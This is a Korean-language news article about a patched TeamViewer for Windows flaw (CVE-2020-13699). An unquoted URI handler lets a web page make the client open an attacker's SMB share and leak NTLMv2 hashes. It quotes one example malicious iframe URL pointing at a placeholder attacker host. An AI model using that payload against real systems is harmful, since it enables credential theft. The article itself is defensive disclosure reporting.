팀뷰어의 결함으로 해커가 시스템 비밀번호를 탈취할 수 있음

팀뷰어는 최근 원격 공격자가 시스템 비밀번호를 탈취하고 이를 악용할 수 있는 고위험 취약점을 패치하기 위해 Windows용 데스크톱 앱의 새로운 버전을 출시했습니다.

더욱 우려스러운 점은 이 공격이 피해자의 상호작용을 필요로 하지 않으며 거의 자동으로 수행될 수 있다는 것입니다.

모르는 분들을 위해 설명하자면, 팀뷰어는 독일 회사 TeamViewer GmbH에서 개발한 원격 제어, 데스크톱 공유, 온라인 회의, 웹 회의 및 컴퓨터 간 파일 전송을 위한 인기 있는 소프트웨어 애플리케이션입니다.

이 소프트웨어는 Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 및 BlackBerry 운영 체제에서 사용할 수 있습니다. 또한 웹 브라우저를 통해 팀뷰어가 실행되는 시스템에 접근하는 것도 가능합니다.

CVE-2020-13699라는 심각한 취약점은 Praetorian의 보안 연구원인 제프리 호프만에 의해 처음 발견되었습니다. 연구원에 따르면, 이 취약점은 팀뷰어의 Windows 버전에서 애플리케이션이 사용자 정의 URI(인용되지 않은 URI 핸들러)를 인용하는 방식에 존재합니다.

전문가는 이 문제가 공격자가 소프트웨어가 NTLM 인증 요청을 공격자의 시스템으로 중계하도록 강제할 수 있게 만든다고 밝혔습니다. 다시 말해, 공격자는 웹 페이지에서 팀뷰어의 URI 스킴을 강제로 사용하여 피해자의 시스템에 설치된 애플리케이션을 속여 공격자가 소유한 원격 SMB 공유에 연결을 시작하도록 할 수 있습니다.

이로 인해 SMB 인증 프로세스가 시작되고, 이 과정에서 시스템의 사용자 이름과 NTLMv2 해시된 비밀번호가 공격자에게 유출됩니다.

CVE 2020-13699를 성공적으로 악용하기 위해 공격자는 웹사이트에 악성 iframe을 삽입한 후 피해자를 속여 악의적으로 제작된 URL을 방문하도록 해야 합니다. 피해자가 링크를 클릭하면 팀뷰어가 자동으로 Windows 데스크톱 클라이언트를 실행하고 원격 SMB 공유를 엽니다.

“공격자는 제작된 URL(iframe src=’teamviewer10: –play \attacker-IPake.tvs’)을 가진 악성 iframe을 웹사이트에 삽입하여 팀뷰어 Windows 데스크톱 클라이언트를 실행하고 원격 SMB 공유를 열도록 강제할 수 있습니다.”라고 제프리 호프만이 조언서에서 설명했습니다.

“Windows는 SMB 공유를 열 때 NTLM 인증을 수행하며, 해당 요청은 코드 실행을 위해 중계될 수 있습니다(또는 해시 크래킹을 위해 캡처될 수 있습니다).”

이 취약점은 “URI 핸들러 teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, 및 tvvpn1”에 영향을 미칩니다. 호프만이 말했습니다.

취약점이 공개된 후, 팀뷰어 프로젝트는 영향을 받는 URI 핸들러에 의해 전달된 매개변수를 인용하여 결함을 패치했습니다. 예: URL:teamviewer10 프로토콜 “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1”.

결함을 패치하기 위해 “CVE 2020-13699와 관련된 URI 처리 개선을 구현했습니다.”라고 팀뷰어가 성명에서 밝혔습니다. “Praetorian의 제프리 호프만에게 전문성과 책임 있는 공개 모델을 따르는 것에 감사드립니다. 당신이 우리에게 연락해 주셔서 감사하며, 최신 릴리스에서 당신의 발견 사항의 수정이 확인되었다는 것에 감사드립니다.”

문제를 해결하기 위해 팀뷰어는 버전 15.8.3을 출시했으며, 사용자에게 즉시 이 버전으로 업그레이드할 것을 권장합니다.

또한 읽어보세요 - 최고의 팀뷰어 대안